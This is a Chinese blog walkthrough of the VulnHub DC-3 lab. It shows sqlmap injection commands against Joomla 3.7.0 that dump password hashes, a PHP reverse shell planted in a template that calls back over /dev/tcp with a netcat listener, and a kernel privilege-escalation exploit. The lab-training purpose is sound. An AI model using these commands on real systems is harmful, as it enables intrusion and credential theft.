DC-3靶机

已于 2023-09-12 16:56:22 修改
阅读量375 收藏 1
点赞数
文章标签: 安全 web安全 php 网络
于 2023-02-16 16:06:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Flamingo1998/article/details/129004296
版权

一、搭建环境

  1. 下载靶机:https://download.vulnhub.com/dc/DC-3-2.zip

  1. 解压靶机得到一个.ova文件

  1. 利用虚拟机打开文件,将网卡设置成NAT模式,启动虚拟机

二、渗透过程

  1. 利用nmap扫描DC-3的IP地址


nmap -sP 192.168.XX.0/24

在使用arp-scan扫描一下


arp-scan -l -I eth1

  1. 对主机进一步扫描端口服务,开放了80端口

访问80端口

(这一次,只有一面旗帜,一个切入点,没有任何线索。

要获得标志,显然必须获得root权限。

你如何成为根取决于你——当然,也取决于系统。

祝你好运,我希望你喜欢这个小小的挑战)

在看看网站其他信息,看到网站CMS是Joomla

  1. 漏洞扫描一下CMS


joomscan --url http://192.168.88.167

在尝试目录扫描一下对比一下


dirsearch -u http://192.168.88.167

访问发现是个后台网页

  1. 进入msf找一下漏洞,尝试使用该漏洞打,发现没成功

使用searchsploit,可以看到第一个也是SQL注入


searchsploit joomla 3.7.0

查看一下这个文本


searchsploit -x  php/webapps/42033.txt

sqlmap -u "http://192.168.88.167/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

进一步爆表


sqlmap -u "http://192.168.88.167/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

进一步爆字段


sqlmap -u "http://192.168.88.167/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#_users" --columns -p list[fullordering]

爆数据


sqlmap -u "http://192.168.88.167/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb"  -T "#__users" -C "name,username,password" --dump  -p list[fullordering]

将密码的hash值保存在pw.txt里

使用jhon进行暴力解密,snoopy

  1. 拿着账户和密码登入进去

在这个目录下面发现好像是网页的模板

  1. 在网页模板这里尝试写一个反弹shell(考虑到这种题都需要提权,就不用一句话木马了)


<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.88.147/4444 0>&1' ");
?>
#这里为kali地址

接下找到写的反弹shell的路径,我先是扫描了一遍目录,大致路径为/templates/beez3/html/shell.php

  1. 写好以后使用kali监听,然后浏览器在访问一下/templates/beez3/html/shell.php文件


nc -lvvp 4444

  1. 查看系统版本发现是Ubuntu16.04


cat /etc/issue

使用searchsploit搜索一下漏洞

选择39772这个,查看完整路径


searchsploit -p 39772.txt

拷贝到当前目录

看到需要下载一个zip包,复制链接进行下载

将这个包上传到DC-3主机中,在同一网段下直接开一个http服务

在DC-3主机里面下载,下载成功,然后解压文件

我们需要使用exploit.tar这个压缩包,所有进入目录解压

进入目录,运行下面命令,可以看到提权成功,为了方便做一个交互shell


./compile.sh   #执行脚本,编译文件
./doubleput  #执行提权文件
python -c 'import pty;pty.spawn("/bin/bash")'  (做一个交互shell,如果是交互界面就不用了)

  1. 查找最后一个flag

Flamingo弗
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
DC-3 靶机
weixin_63492470的博客
03-11 5367
DC-3 DC-3 | Five86 | DC Challenges (靶机下载地址) 环境:DC-3靶机地址:192.168.1.152 kali地址:192.168.1.176 都是桥接模式 1 .收集信息 nmap -sP 192.168.1.0/24 nmap -A 192.168.1.152 #发现joomla内容管理系统 访问 192.168.1.152 #发现 提示只有一个入口,让我们提权为root用户 知道网站用的是joomla cms,那我们就可以使用
【技术分享】实战dc-3靶场及其技巧讲解
Innocence_0的博客
07-23 200
本期技术文章将与大家分享小星实战“dc-3靶场”的经验,通过分析其渗透过程以及不同的getshell方法,与大家共同探讨该靶场的破解技巧。
靶机-DC3
-----------------------------------------------------------------------------------------
11-27 857
在Joomla框架中,Templates是直接存在于根目录下的,于是我们进行访问查看一句话木马是否上传成功,我们进入网站查看测试。接着我们下载该压缩包并放到kali桌面里,解压该文件,然后在桌面开启http服务,将下载好的文件导入到DC-3靶机里。在http://192.168.254.3/index.php发现编写处,发现有过滤,跳过。进入解压后的目录中,按照searchsploit工具中的提示进行提权。使用joomscan来扫描DC-3。2、安装joomscan。看到sqlmap 语句。
OWASP靶机下载安装
最新发布
m0_63602484的博客
04-18 418
第一次安装这个靶机的时候,发现靶机未显示ip地址,我也是通过自行配置ip地址才解决了无法访问的问题。2. 下载完成后,解压缩(这里自行创建目录文件即可,注意:路径中尽量不要出现中文字符)1. 开启VM虚拟机,选择打开虚拟机,选中刚才安装的OWASP靶机的.vmx文件即可。4. 输入账户和密码(这里提示用户名为:root,密码为:owaspbwa)2. 开启OWASP虚拟机,这里网络适配器应为NAT模式。6.通过浏览器访问OWASP靶机web界面。3. 选择我已复制该虚拟机。
CTF6靶机实战.zip
05-25
CTF6靶机实战包括三部分: 1)靶机实战过程 2)文件上传的反弹shell文件(shell.php) 3)系统版本漏洞需要的文件(8478.sh)
靶机 DC-3
m0_66299232的博客
09-15 251
DC系列,joomscan,靶机,ssh登录,sqlmap,john解密,内核漏洞提权,nmap
DC3-靶机
Au
08-22 4090
下载地址 这块填一下坑,上面那个链接有两个下载地址,本人是使用VMware虚拟机,下了第一个ova的导入,使用nmap扫,怎么也扫不到存活主机,一直以为是我本地环境的问题,最后没招了,准备重新下一个试试,然后到下载页面一看,作者已经被反馈过这个问题了,又做了一个新的VMware镜像,可以直接使用。 坑啊! 所以使用VMware的同学,下载第二个即可。 配置的环境: kali : 192.16...
靶机渗透DC-3
weixin_44801963的博客
11-01 256
文章目录一、环境准备KaliDC-3二、渗透步骤1、信息收集2、漏洞探测3、漏洞利用1、SQL注入漏洞利用2、任意文件执行漏洞4、权限提升5、Get flag三、Have Fun 一、环境准备 Kali DC-3 下载官网:https://www.five86.com/ 二、渗透步骤 1、信息收集 主机发现 目标端口扫描 访问80服务 网站指纹识别 Joomla CMS扫描 扫除管理员登录界面 . 2、漏洞探测 查询 joomla 3.7.0已知的漏洞 3、漏洞利用 1、SQL注入漏洞利用
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
dc-4靶机练习.docx
01-02
靶机web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
DC3靶机
PigLL的博客
08-11 405
## 关于DC3 靶机实验 1.信息收集: 2.网站信息 在浏览器中访问DC3的IP 利用工具kali中的nikto做一个简单的信息识别 通过扫描可以看到一些目录 然后通过浏览器可以访问 然后利用joomla专用的扫描工具joomscan扫描 发现了joomla的版本和一些目录 通过kali中的工具searchsploit扫描joomla 3.7.0版本存在的漏洞 通过扫描发现了一个42033.txt文件 通过searchsploit 将42033文件下载到当前目录 查看42033文件 发现
DC3靶机
qq_40646572的博客
04-25 518
DC3靶机挑战
DC-3--vulnhub靶场
m0_46982383的博客
07-20 288
靶机地址:http://www.five86.com/downloads/DC-3.zip 网络:NAT目录1、主机发现2、使用joomscan3、searchsploit Joomla 3.7.04、 一句话木马获取shell,中国蚁剑连接上传文件5、提权准备6、msf监听获取shell,提权 7、总结,主机发现扫不出靶机地址......
靶机DC-3—WP
m0_66638011的博客
05-17 1060
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
靶机实战(DC-3)
weixin_45605313的博客
06-30 318
DC-3实验环境实验过程信息收集主机发现端口扫描服务发现目录扫描漏洞发现漏洞利用提权总结 实验环境 靶机DC-3 测试机:kali(IP:192.168.186.128),win10 实验过程 信息收集 主机发现 netdiscover -I eth0 -r 192.168.186.0/24 nmap -sn 192.168.186.0/24 arp-scan -l ,arp-scan 192.168.186.0/24 端口扫描 masscan -p 0-65535 --rate=100000 192
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值